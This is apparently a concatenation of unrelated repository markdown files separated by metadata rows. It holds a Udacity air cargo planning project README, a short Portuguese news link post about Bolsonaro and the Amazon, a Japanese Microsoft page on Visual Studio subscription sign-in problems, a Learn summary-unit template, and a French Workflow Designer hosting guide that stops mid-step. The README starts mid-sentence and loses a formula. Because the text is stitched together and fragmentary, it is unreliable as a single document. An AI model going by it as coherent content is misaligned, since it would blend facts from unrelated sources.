Instead, you will implement domain-independent heuristics.

- Part 1 - Planning problems:
- READ: applicable portions of the Russel/Norvig AIMA text
- GIVEN: problems defined in classical PDDL (Planning Domain Definition Language)
- TODO: Implement the Python methods and functions as marked in `my_air_cargo_problems.py`
- TODO: Experiment and document metrics
- Part 2 - Domain-independent heuristics:
- READ: applicable portions of the Russel/Norvig AIMA text
- TODO: Implement relaxed problem heuristic in `my_air_cargo_problems.py`
- TODO: Implement Planning Graph and automatic heuristic in `my_planning_graph.py`
- TODO: Experiment and document metrics
- Part 3 - Written Analysis
## Environment requirements
- Python 3.4 or higher
- Starter code includes a copy of [companion code](https://github.com/aimacode) from the Stuart Russel/Norvig AIMA text.
## Project Details
### Part 1 - Planning problems
#### READ: Stuart Russel and Peter Norvig text:
"Artificial Intelligence: A Modern Approach" 3rd edition chapter 10 *or* 2nd edition Chapter 11 on Planning, available [on the AIMA book site](http://aima.cs.berkeley.edu/2nd-ed/newchap11.pdf) sections:
- *The Planning Problem*
- *Planning with State-space Search*
#### GIVEN: classical PDDL problems
All problems are in the Air Cargo domain. They have the same action schema defined, but different initial states and goals.
- Air Cargo Action Schema:
```
Action(Load(c, p, a),
PRECOND: At(c, a) ∧ At(p, a) ∧ Cargo(c) ∧ Plane(p) ∧ Airport(a)
EFFECT: ¬ At(c, a) ∧ In(c, p))
Action(Unload(c, p, a),
PRECOND: In(c, p) ∧ At(p, a) ∧ Cargo(c) ∧ Plane(p) ∧ Airport(a)
EFFECT: At(c, a) ∧ ¬ In(c, p))
Action(Fly(p, from, to),
PRECOND: At(p, from) ∧ Plane(p) ∧ Airport(from) ∧ Airport(to)
EFFECT: ¬ At(p, from) ∧ At(p, to))
```
- Problem 1 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK)
∧ At(P1, SFO) ∧ At(P2, JFK)
∧ Cargo(C1) ∧ Cargo(C2)
∧ Plane(P1) ∧ Plane(P2)
∧ Airport(JFK) ∧ Airport(SFO))
Goal(At(C1, JFK) ∧ At(C2, SFO))
```
- Problem 2 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK) ∧ At(C3, ATL)
∧ At(P1, SFO) ∧ At(P2, JFK) ∧ At(P3, ATL)
∧ Cargo(C1) ∧ Cargo(C2) ∧ Cargo(C3)
∧ Plane(P1) ∧ Plane(P2) ∧ Plane(P3)
∧ Airport(JFK) ∧ Airport(SFO) ∧ Airport(ATL))
Goal(At(C1, JFK) ∧ At(C2, SFO) ∧ At(C3, SFO))
```
- Problem 3 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK) ∧ At(C3, ATL) ∧ At(C4, ORD)
∧ At(P1, SFO) ∧ At(P2, JFK)
∧ Cargo(C1) ∧ Cargo(C2) ∧ Cargo(C3) ∧ Cargo(C4)
∧ Plane(P1) ∧ Plane(P2)
∧ Airport(JFK) ∧ Airport(SFO) ∧ Airport(ATL) ∧ Airport(ORD))
Goal(At(C1, JFK) ∧ At(C3, JFK) ∧ At(C2, SFO) ∧ At(C4, SFO))
```
#### TODO: Implement methods and functions in `my_air_cargo_problems.py`
- `AirCargoProblem.get_actions` method including `load_actions` and `unload_actions` sub-functions
- `AirCargoProblem.actions` method
- `AirCargoProblem.result` method
- `air_cargo_p2` function
- `air_cargo_p3` function
#### TODO: Experiment and document metrics for non-heuristic planning solution searches
* Run uninformed planning searches for `air_cargo_p1`, `air_cargo_p2`, and `air_cargo_p3`; provide metrics on number of node expansions required, number of goal tests, time elapsed, and optimality of solution for each search algorithm. Include the result of at least three of these searches, including breadth-first and depth-first, in your write-up (`breadth_first_search` and `depth_first_graph_search`).
* If depth-first takes longer than 10 minutes for Problem 3 on your system, stop the search and provide this information in your report.
* Use the `run_search` script for your data collection: from the command line type `python run_search.py -h` to learn more.
>#### Why are we setting the problems up this way?
>Progression planning problems can be
solved with graph searches such as breadth-first, depth-first, and A*, where the
nodes of the graph are "states" and edges are "actions". A "state" is the logical
conjunction of all boolean ground "fluents", or state variables, that are possible
for the problem using Propositional Logic. For example, we might have a problem to
plan the transport of one cargo, C1, on a
single available plane, P1, from one airport to another, SFO to JFK.

In this simple example, there are five fluents, or state variables, which means our state
space could be as large as . Note the following:
>- While the initial state defines every fluent explicitly, in this case mapped to **TTFFF**, the goal may
be a set of states. Any state that is `True` for the fluent `At(C1,JFK)` meets the goal.
>- Even though PDDL uses variable to describe actions as "action schema", these problems
are not solved with First Order Logic. They are solved with Propositional logic and must
therefore be defined with concrete (non-variable) actions
and literal (non-variable) fluents in state descriptions.
>- The fluents here are mapped to a simple string representing the boolean value of each fluent
in the system, e.g. **TTFFTT...TTF**. This will be the state representation in
the `AirCargoProblem` class and is compatible with the `Node` and `Problem`
classes, and the search methods in the AIMA library.
### Part 2 - Domain-independent heuristics
#### READ: Stuart Russel and Peter Norvig text
"Artificial Intelligence: A Modern Approach" 3rd edition chapter 10 *or* 2nd edition Chapter 11 on Planning, available [on the AIMA book site](http://aima.cs.berkeley.edu/2nd-ed/newchap11.pdf) section:
- *Planning Graph*
#### TODO: Implement heuristic method in `my_air_cargo_problems.py`
- `AirCargoProblem.h_ignore_preconditions` method
#### TODO: Implement a Planning Graph with automatic heuristics in `my_planning_graph.py`
- `PlanningGraph.add_action_level` method
- `PlanningGraph.add_literal_level` method
- `PlanningGraph.inconsistent_effects_mutex` method
- `PlanningGraph.interference_mutex` method
- `PlanningGraph.competing_needs_mutex` method
- `PlanningGraph.negation_mutex` method
- `PlanningGraph.inconsistent_support_mutex` method
- `PlanningGraph.h_levelsum` method
#### TODO: Experiment and document: metrics of A* searches with these heuristics
* Run A* planning searches using the heuristics you have implemented on `air_cargo_p1`, `air_cargo_p2` and `air_cargo_p3`. Provide metrics on number of node expansions required, number of goal tests, time elapsed, and optimality of solution for each search algorithm and include the results in your report.
* Use the `run_search` script for this purpose: from the command line type `python run_search.py -h` to learn more.
>#### Why a Planning Graph?
>The planning graph is somewhat complex, but is useful in planning because it is a polynomial-size approximation of the exponential tree that represents all possible paths. The planning graph can be used to provide automated admissible heuristics for any domain. It can also be used as the first step in implementing GRAPHPLAN, a direct planning algorithm that you may wish to learn more about on your own (but we will not address it here).
>*Planning Graph example from the AIMA book*
>
### Part 3: Written Analysis
#### TODO: Include the following in your written analysis.
- Provide an optimal plan for Problems 1, 2, and 3.
- Compare and contrast non-heuristic search result metrics (optimality, time elapsed, number of node expansions) for Problems 1,2, and 3. Include breadth-first, depth-first, and at least one other uninformed non-heuristic search in your comparison; Your third choice of non-heuristic search may be skipped for Problem 3 if it takes longer than 10 minutes to run, but a note in this case should be included.
- Compare and contrast heuristic search result metrics using A* with the "ignore preconditions" and "level-sum" heuristics for Problems 1, 2, and 3.
- What was the best heuristic used in these problems? Was it better than non-heuristic search planning methods for all problems? Why or why not?
- Provide tables or other visual aids as needed for clarity in your discussion.
## Examples and Testing:
- The planning problem for the "Have Cake and Eat it Too" problem in the book has been
implemented in the `example_have_cake` module as an example.
- The `tests` directory includes `unittest` test cases to evaluate your implementations. All tests should pass before you submit your project for review. From the AIND-Planning directory command line:
- `python -m unittest tests.test_my_air_cargo_problems`
- `python -m unittest tests.test_my_planning_graph`
- You can run all the test cases with additional context by running `python -m unittest -v`
- The `run_search` script is provided for gathering metrics for various search methods on any or all of the problems and should be used for this purpose.
## Submission
Before submitting your solution to a reviewer, you are required to submit your project to Udacity's Project Assistant, which will provide some initial feedback.
The setup is simple. If you have not installed the client tool already, then you may do so with the command `pip install udacity-pa`.
To submit your code to the project assistant, run `udacity submit` from within the top-level directory of this project. You will be prompted for a username and password. If you login using google or facebook, visit [this link](https://project-assistant.udacity.com/auth_tokens/jwt_login) for alternate login instructions.
This process will create a zipfile in your top-level directory named cargo_planning-<id>.zip. This is the file that you should submit to the Udacity reviews system.
## Improving Execution Time
The exercises in this project can take a *long* time to run (from several seconds to a several hours) depending on the heuristics and search algorithms you choose, as well as the efficiency of your own code. (You may want to stop and profile your code if runtimes stretch past a few minutes.) One option to improve execution time is to try installing and using [pypy3](http://pypy.org/download.html) -- a python JIT, which can accelerate execution time substantially. Using pypy is *not* required (and thus not officially supported) -- an efficient solution to this project runs in very reasonable time on modest hardware -- but working with pypy may allow students to explore more sophisticated problems than the examples included in the project.
"# AIND-Planning"
| 61.430168 | 749 | 0.758912 | eng_Latn | 0.991963 |
e04281f7c73eae3572466921d75e45bbec43bfa4 | 815 | md | Markdown | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | 1 | 2022-01-13T07:57:24.000Z | 2022-01-13T07:57:24.000Z | ---
layout: post
item_id: 2553623443
title: >-
Bolsonaro quer explorar Amazônia com os Estados Unidos
author: Tatu D'Oquei
date: 2019-04-09 00:41:38
pub_date: 2019-04-09 00:41:38
time_added: 2019-06-27 06:44:06
category:
tags: []
image: http://p2.trrsf.com/image/fget/cf/800/450/middle/images.terra.com/2019/04/09/47980904354.jpg
---
Em entrevista a emissora de rádio, presidente conta que propôs a Donald Trump parceria para exploração da região. Bolsonaro promete ainda rever demarcação de terras indígenas.
**Link:** [https://www.terra.com.br/noticias/brasil/bolsonaro-quer-explorar-amazonia-com-os-estados-unidos,0fe3cd0344bfef7a8d290ca3d469b34c2j51h46h.html](https://www.terra.com.br/noticias/brasil/bolsonaro-quer-explorar-amazonia-com-os-estados-unidos,0fe3cd0344bfef7a8d290ca3d469b34c2j51h46h.html)
| 42.894737 | 296 | 0.792638 | por_Latn | 0.667117 |
e04518c16f3b45462d7acd19a7ef4daa2bcf0748 | 5,068 | md | Markdown | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 21 | 2018-01-02T00:40:26.000Z | 2021-11-27T22:41:23.000Z | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 1,784 | 2018-02-14T20:18:58.000Z | 2021-10-02T07:23:46.000Z | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 53 | 2017-12-13T07:35:40.000Z | 2021-11-24T05:45:59.000Z | ---
title: Visual Studio サブスクリプションへのサインインに関する問題 | Microsoft Docs
author: evanwindom
ms.author: cabuschl
manager: cabuschl
ms.assetid: 176c7f11-b19d-49e9-a6dd-b2e5da5e8480
ms.date: 10/13/2021
ms.topic: conceptual
description: Visual Studio サブスクリプションにサインインするときに発生する可能性のある問題について説明します
ms.openlocfilehash: 2613a80eb6439e9ce152ad1ba23098e1ffb92209
ms.sourcegitcommit: 72f8ce4992cc62c4833e6dcb0f79febb328c44be
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 10/14/2021
ms.locfileid: "130011381"
---
# <a name="issues-signing-in-to-visual-studio-subscriptions"></a>Visual Studio サブスクリプションへのサインインに関する問題
Visual Studio サブスクリプションを使用するには、最初にサインインする必要があります。 サブスクリプションによっては、Microsoft アカウント (MSA) または Azure Active Directory (Azure AD) ID を使用してセットアップされている場合があります。 この記事では、サブスクリプションにサインインするときに発生する可能性がある問題について説明します。
## <a name="microsoft-accounts-msa-cannot-be-created-using-workschool-email-addresses"></a>職場/学校のメール アドレスを使用して Microsoft アカウント (MSA) を作成することはできない
職場/学校のメール アドレスを使用して新しい個人用 Microsoft アカウント (MSA) を作成することは、メール ドメインが Azure AD で構成されているときは許可されません。 これはどういう意味でしょうか。 Microsoft 365 または Azure AD に依存する他の Microsoft 提供ビジネス サービスが組織で使用されていて、Azure AD テナントにドメイン名を追加している場合、ユーザーはドメインのメール アドレスを使って新しい個人用 Microsoft アカウントを作成できなくなります。
### <a name="why-was-this-change-made"></a>この変更が行われた理由
職場のアドレスをユーザー名として使って個人用 Microsoft アカウントを作成することは、エンド ユーザーにとっても IT 部門にとっても問題があることです。 次に例を示します。
- ユーザーは、自分の個人用 Microsoft アカウントがビジネスに準拠していて、自分の OneDrive にビジネス ドキュメントを保存してもポリシーを遵守していると考える可能性があります
- 組織を離れたユーザーは、通常、職場のメール アドレスにアクセスできなくなります。 そうなったとき、自分のパスワードを忘れた場合、自分の個人用 Microsoft アカウントに戻れなくなる場合があります。 逆に、IT 部門は該当者のパスワードをリセットして、退職した従業員の個人用アカウントに入ることができます。
- IT 部門は、アカウントの所有権とセキュリティに関して誤った認識を持っています。 しかし、ユーザーは、職場のメール アドレスにコードを 1 回ラウンドトリップするだけで、後でいつでも自分のアカウント名を変更できます。
そのような状況は、同じメール アドレスで 2 つのアカウント (Azure AD と Microsoft アカウント) を持っているユーザーの場合、特に混乱を招きます。
### <a name="what-does-this-experience-look-like"></a>この場合に表示されるエクスペリエンス
職場または学校のメール アドレスで Microsoft のコンシューマー アプリにサインアップしようとすると、次のようなメッセージが表示されます。
> [!div class="mx-imgBorder"]
> 
一方、個人用アカウントと職場/学校アカウントをサポートする Microsoft アプリにサインアップしようとすると、次のようなメッセージが表示されます。
> [!div class="mx-imgBorder"]
> 
### <a name="are-existing-accounts-affected"></a>既存のアカウントへの影響
ここで説明したサインアップのブロックでは、新しいアカウントの作成だけが禁止されます。 職場/学校のメール アドレスで既に Microsoft アカウントを持っているユーザーには影響ありません。 既にそのような状況になっている場合、個人用 Microsoft アカウントの名前を簡単に変更できるようになっています。 簡単なステップ バイ ステップ ガイダンスが、こちらの[サポート記事](https://windows.microsoft.com/en-US/Windows/rename-personal-microsoft-account)で提供されています。 個人用 Microsoft アカウントの名前の変更とはユーザー名を変更することを意味し、職場のメールや、Microsoft 365 などのビジネス サービスへのサインイン方法には影響ありません。 また、個人情報にも影響しません。サインイン方法が変わるだけです。 別の (個人用) メール アドレスを使用したり、新しい @outlook.com メール アドレスを Microsoft から取得したり、自分の電話番号を新しいユーザー名として使用したりすることができます。
> [!NOTE]
> たとえば Premier サポートなどの Microsoft ビジネス サービスにアクセスするために、IT 部門から職場/学校のメール アドレスで個人用 Microsoft アカウントを作成するよう要求された場合は、アカウントの名前を変更する前に管理チームに連絡します。
## <a name="deleting-a-sign-in-address-may-prevent-access-to-a-subscription"></a>サインイン アドレスを削除するとサブスクリプションにアクセスできなくなる可能性がある
サブスクリプションに関連付けられている ID (MSA または AAD) を削除した場合、ユーザー名とサインイン ID を含むサブスクライバー情報が匿名になり、サブスクリプションにアクセスできなくなる可能性があります。
サブスクリプションへのアクセスが影響を受けないようにするには、次のいずれかの方法を使用します。
- 両方の ID 管理システムではなく、どちらか一方 (MSA または AAD) だけを配置します。
- テナントを介して、AAD と MSA の ID を関連付けます。
## <a name="signing-in-may-fail-when-using-aliases"></a>エイリアスを使用するとサインインに失敗することがある
サインインに使用されるアカウントの種類によっては、[https://my.visualstudio.com](https://my.visualstudio.com?wt.mc_id=o~msft~docs) にサインインするときに利用可能なサブスクリプションが正しく表示されない場合があります。 考えられる原因の 1 つは、サブスクリプションが割り当てられているサインイン ID の代わりに "別名" または "表示名" を使用していることです。 これは "別名定義" と呼ばれます。
### <a name="what-is-aliasing"></a>別名定義とは
"別名定義" という用語は、Windows (または Active Directory) へのサインインと電子メールへのアクセスに別々の ID を持っているユーザーを指します。
別名定義は、[email protected] のように、会社が自社のディレクトリのサインイン用に Microsoft オンライン サービスを持っているが、ユーザーは [email protected] などの別名や表示名を使用して自分の電子メール アカウントにアクセスしている場合に発生する場合があります。 ボリューム ライセンス サービス センター (VLSC) を介してサブスクリプションを管理している多くのユーザーにとって、これがサインインが失敗する原因となる場合があります。指定したメール アドレス ([email protected]) が、"職場または学校アカウント" オプションを通じて正常に認証するために必要なディレクトリ アドレス ([email protected]) と一致していないからです。
### <a name="what-options-do-i-have"></a>どのようなオプションがありますか
サブスクライバーの観点からは、まず、管理者に問い合わせて、会社の ID の構成を理解することが重要です。 必要に応じて、管理者が管理ポータルから、サブスクライバーのアカウント設定を更新する必要がある場合や、サブスクライバーが自分の会社のメール アドレスを使用して Microsoft アカウント (MSA) を作成する必要がある場合があります。 MSA を作成する手順を実行する前に、この実行に関するポリシーまたは問題について管理者と話します。
## <a name="resources"></a>リソース
- Visual Studio サブスクリプションの販売、サブスクリプション、アカウント、課金のサポートについては、Visual Studio [サブスクリプション サポート](https://aka.ms/vssubscriberhelp)をご覧ください。
## <a name="see-also"></a>関連項目
- [Visual Studio ドキュメント](/visualstudio/)
- [Azure DevOps ドキュメント](/azure/devops/)
- [Azure ドキュメント](/azure/)
- [Microsoft 365 ドキュメント](/microsoft-365/)
## <a name="next-steps"></a>次のステップ
- AAD 内で [MSA アカウントと AAD アカウントをリンクする](/azure/active-directory/b2b/add-users-administrator)方法を学習します。
- [匿名化](anonymization.md)について詳しく学習します。 | 65.818182 | 516 | 0.825375 | jpn_Jpan | 0.756561 |
e045572620e9c64e4972a3bf8c46267b8632516d | 1,058 | md | Markdown | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | 1 | 2020-09-21T10:30:40.000Z | 2020-09-21T10:30:40.000Z | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | null | null | null | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | 2 | 2020-10-01T11:25:45.000Z | 2020-10-02T16:08:57.000Z | # Hire-HELP
> One stop solution to find all kinds of blue-collar labors 👷 and workers near you. 🌄 A way to minimize a major issue prevalent in our society,i.e., unemployment. Made with 💖 using ExpressJS. ✔
## Run Locally
### 1.Clone repository
```sh
$ git clone https://github.com/SpectreX-AHM/Hire-HELP.git
$ cd hire-help
```
### 2.Install MongoDB
Download it from here: https://docs.mongodb.com/manual/administration/install-community/
Create your own collection and add that in mongoose.connect(). We have used cloud MongoDB Atlas for this project.
### 3.Run Backend
```a
$ npm install
$ npm start
```
### 4.Run app on localhost 3000
Create an app.listen function in app.js and run the app on https://localhost:3000
### 5.Api keys
Make sure to add your own api keys of cloudinary and sendgrid under API_KEY
### Map feature works on data of United States
Add the details of cities in cities.js file
### Check out the deployed version 🤘
https://hire-help.herokuapp.com/
## License
MIT © [SpectreX-AHM](https://github.com/SpectreX-AHM) 😊
| 27.128205 | 193 | 0.725898 | eng_Latn | 0.911722 |
e04636ac9df9d7aa74e773ec08fe4079bd45f07f | 2,292 | md | Markdown | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: DONT_SAVE_VSGLOG_TO_TEMP | Microsoft Docs
ms.date: 11/04/2016
ms.topic: conceptual
ms.assetid: f27ab0e6-9575-4ca0-9901-37d3e5c3a2f5
author: mikejo5000
ms.author: mikejo
manager: jmartens
ms.workload:
- multiple
ms.openlocfilehash: f94b287f6ed9d4cda0696252ba32d493879ed5c1
ms.sourcegitcommit: ae6d47b09a439cd0e13180f5e89510e3e347fd47
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 02/08/2021
ms.locfileid: "99880262"
---
# <a name="dont_save_vsglog_to_temp"></a>DONT_SAVE_VSGLOG_TO_TEMP
Define por sua presença se o arquivo de log de gráficos é salvo no diretório de arquivos temporários do usuário.
## <a name="syntax"></a>Sintaxe
```C++
#define DONT_SAVE_VSGLOG_TO_TEMP
```
## <a name="value"></a>Valor
Um símbolo de pré-processador que, por sua presença ou ausência, determina se o arquivo de log de gráficos é salvo no diretório de arquivos temporários do usuário. Se esse símbolo for definido, o nome do arquivo definido pelo `VSG_DEFAULT_RUN_FILENAME` será relativo ao diretório atual do aplicativo capturado, ou será um caminho absoluto; caso contrário, o nome do arquivo definido pelo `VSG_DEFAULT_RUN_FILENAME` será relativo ao diretório de arquivos temporários do usuário e não poderá ser um caminho absoluto.
## <a name="remarks"></a>Comentários
Dependendo dos privilégios do usuário, o arquivo de log de gráficos pode não ser capaz de ser salvo em um local arbitrário. Recomendamos que você prefira salvar os logs de gráficos no diretório de arquivos temporários do usuário ou em outro local válido, se não tiver certeza se o local escolhido pode ser gravado pelo usuário.
Para impedir que o arquivo de log de elementos gráficos seja salvo no diretório de arquivos temporários, você deve definir `DONT_SAVE_VSGLOG_TO_TEMP` antes de incluir `vsgcapture.h` .
## <a name="example"></a>Exemplo
Este exemplo mostra como salvar o arquivo de log de gráficos em um caminho absoluto no computador host.
```cpp
// Define DONT_SAVE_VSGLOG_TO_TEMP and VSG_DEFAULT_RUN_FILENAME before including vsgcapture.h
#define DONT_SAVE_VSGLOG_TO_TEMP
#define VSG_DEFAULT_RUN_FILENAME L"C:\\Graphics Diagnostics Captures\\default.vsglog"
#include <vsgcapture.h>
```
## <a name="see-also"></a>Confira também
- [VSG_DEFAULT_RUN_FILENAME](vsg-default-run-filename.md)
| 47.75 | 515 | 0.799738 | por_Latn | 0.991699 |
e0465095de4ba7d754e8c38271e6f32205f9dad4 | 86 | md | Markdown | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | 1 | 2021-08-28T01:44:31.000Z | 2021-08-28T01:44:31.000Z | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | null | null | null | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | null | null | null | ---
title: "Blog"
linkTitle: "Blog"
date: 2020-06-12
menu:
main:
weight: 10
---
| 9.555556 | 17 | 0.581395 | eng_Latn | 0.260952 |
e046cd9e442c9e6e16084948107196a9869a3897 | 4,353 | md | Markdown | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 4 | 2021-02-23T21:54:01.000Z | 2022-03-24T10:48:07.000Z | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 11 | 2021-02-19T01:17:40.000Z | 2022-01-10T20:09:34.000Z | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 15 | 2021-01-27T19:17:09.000Z | 2022-03-14T21:45:13.000Z | <!-- 1. Restate the scenario problem --------------------------------------------------------------------------------
Goal: Summarize the challenge(s) posed in the introduction scenario; be brief (1-2 sentences)
Heading: none
Example: "You are writing the instruction manual for a new model fire extinguisher. The instructions must be quickly read and understood by a wide variety of people."
[Summary unit guidance](https://review.docs.microsoft.com/learn-docs/docs/id-guidance-module-summary-unit?branch=master)
-->
TODO: restate the scenario problem
<!-- 2. Show how you solved the scenario problem(s)---------------------------------------------------
Goal: Describe how you used the product to solve the problem(s) posed in the introduction scenario
Heading: none; depending on length, you can put this in a separate paragraph or combine this with the previous section into a single paragraph
Recommended: format this as lead-in sentence(s) followed by a list
Example: "You did some research and found that Plain English is a good writing style for safety-critical communications. You applied several Plain English techniques to your instructions:
* Removed unnecessary words, which made your sentences easier to read even in a stressful situation like a fire.
* Made sure all sentences used the active voice, which made your content more direct.
* Replaced fire-industry jargon with everyday words, which made the instructions accessible to a wider audience.
* Replaced a comma-delimited list with a bulleted list, which made the steps to activate the fire extinguisher easier to follow."
-->
TODO: add your lead-in sentence(s)
TODO: add your list of techniques used to solve the scenario problem
<!-- 3. Describe the experience without the product ---------------------------------------------------
Goal: Describe what would be required to solve the problem without using the product; be brief (1-2 sentences)
Heading: none; typically this will be a new paragraph
Example: "Fire extinguishers are critical safety equipment for both homes and businesses. Despite their importance, many customers don't read the instructions ahead of time. Confusing instructions could mean customers don't use the extinguisher correctly when they're needed. This can result in loss of property or life."
-->
TODO: describe the experience without the product
<!-- 4. Describe the business impact ----------------------------------------------------
Goal: explain the business impact of using the product to solve the problem
Heading: none; depending on length, you can put this in a separate paragraph or combine this with the previous section into a single paragraph
Example: "The test for effective instructions is whether customers can use your extinguishers correctly during an emergency. Users that fail might blame the instructions or the product. In either case, it's not good for business. On the other hand, successful customers are likely to share their stories and become advocates for your product."
-->
TODO: describe the business impact
<!-- 5. References (optional) ----------------------------------------------------
Goal: Provide a few recommendations for further study via a bulleted list of links. This is optional and intended to be used sparingly. - use the target page title as the text for your link
- do not include other text such as a description
- prefer other first-party sites like Docs reference pages
- link to third-party sites only when they are trusted and authoritative
- do not link to other Learn content ("next steps" recommendations are generated automatically)
- avoid linking to opinion sites such as blog posts
Heading: "## References"
Example:
"## References
* [Administrator role permissions in Azure Active Directory](https://docs.microsoft.com/azure/active-directory/users-groups-roles/directory-assign-admin-roles)
* [What is Azure role-based access control (Azure RBAC)?](https://docs.microsoft.com/azure/role-based-access-control/overview)
* [Manage access to billing information for Azure](https://docs.microsoft.com/azure/billing/billing-manage-access)"
-->
<!-- Do not include any other content -->
| 62.185714 | 347 | 0.702963 | eng_Latn | 0.998298 |
e047b18c0a17dee72921bedff10fdd567e81d131 | 6,943 | md | Markdown | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Tâche 2 : héberger le Workflow Designer'
ms.date: 03/30/2017
ms.assetid: 0a29b138-270d-4846-b78e-2b875e34e501
ms.openlocfilehash: 8e4c17ed182cec7748b9a1f11f76ff90aa60c39e
ms.sourcegitcommit: 5fb5b6520b06d7f5e6131ec2ad854da302a28f2e
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 12/03/2019
ms.locfileid: "74715789"
---
# <a name="task-2-host-the-workflow-designer"></a>Tâche 2 : héberger le Workflow Designer
Cette rubrique décrit la procédure d’hébergement d’une instance de Windows Concepteur de flux de travail dans une application Windows Presentation Foundation (WPF).
La procédure configure le contrôle de **grille** qui contient le concepteur, crée par programmation une instance du <xref:System.Activities.Presentation.WorkflowDesigner> qui contient une activité de <xref:System.Activities.Statements.Sequence> par défaut, inscrit les métadonnées du concepteur pour fournir la prise en charge du concepteur pour toutes les activités intégrées et héberge les concepteur de flux de travail dans l’application WPF.
## <a name="to-host-the-workflow-designer"></a>Pour héberger le concepteur de workflow
1. Ouvrez le projet HostingApplication que vous avez créé dans [tâche 1 : créer une application de Windows Presentation Foundation](task-1-create-a-new-wpf-app.md).
2. Ajustez la taille de la fenêtre pour faciliter l’utilisation de la Concepteur de flux de travail. Pour ce faire, sélectionnez **MainWindow** dans le concepteur, appuyez sur F4 pour afficher la fenêtre **Propriétés** , puis, dans la section **disposition** , affectez à la **largeur** la valeur 600 et à la **hauteur** la valeur 350.
3. Définissez le nom de la grille en sélectionnant le panneau **grille** dans le concepteur (cliquez sur la zone à l’intérieur de **MainWindow**) et en définissant la propriété **Name** en haut de la fenêtre **Propriétés** sur « grid1 ».
4. Dans la fenêtre **Propriétés** , cliquez sur le bouton de sélection ( **...** ) en regard de la propriété `ColumnDefinitions` pour ouvrir la boîte de dialogue **éditeur de collections** .
5. Dans la boîte de dialogue **éditeur de collection** , cliquez trois fois sur le bouton **Ajouter** pour insérer trois colonnes dans la mise en page. La première colonne contient la **boîte à outils**, la deuxième héberge la concepteur de flux de travail, et la troisième colonne est utilisée pour l’inspecteur de propriété.
6. Affectez à la propriété `Width` de la colonne Middle la valeur « 4 * ».
7. Cliquez sur **OK** pour enregistrer les modifications. Le code XAML suivant est ajouté à votre fichier *MainWindow. Xaml* :
```xaml
<Grid Name="grid1">
<Grid.ColumnDefinitions>
<ColumnDefinition />
<ColumnDefinition Width="4*" />
<ColumnDefinition />
</Grid.ColumnDefinitions>
</Grid>
```
8. Dans **Explorateur de solutions**, cliquez avec le bouton droit sur *MainWindow. Xaml* et sélectionnez **afficher le code**. Modifiez le code en procédant comme suit :
1. Ajoutez les espaces de noms suivants :
```csharp
using System.Activities;
using System.Activities.Core.Presentation;
using System.Activities.Presentation;
using System.Activities.Presentation.Metadata;
using System.Activities.Presentation.Toolbox;
using System.Activities.Statements;
using System.ComponentModel;
```
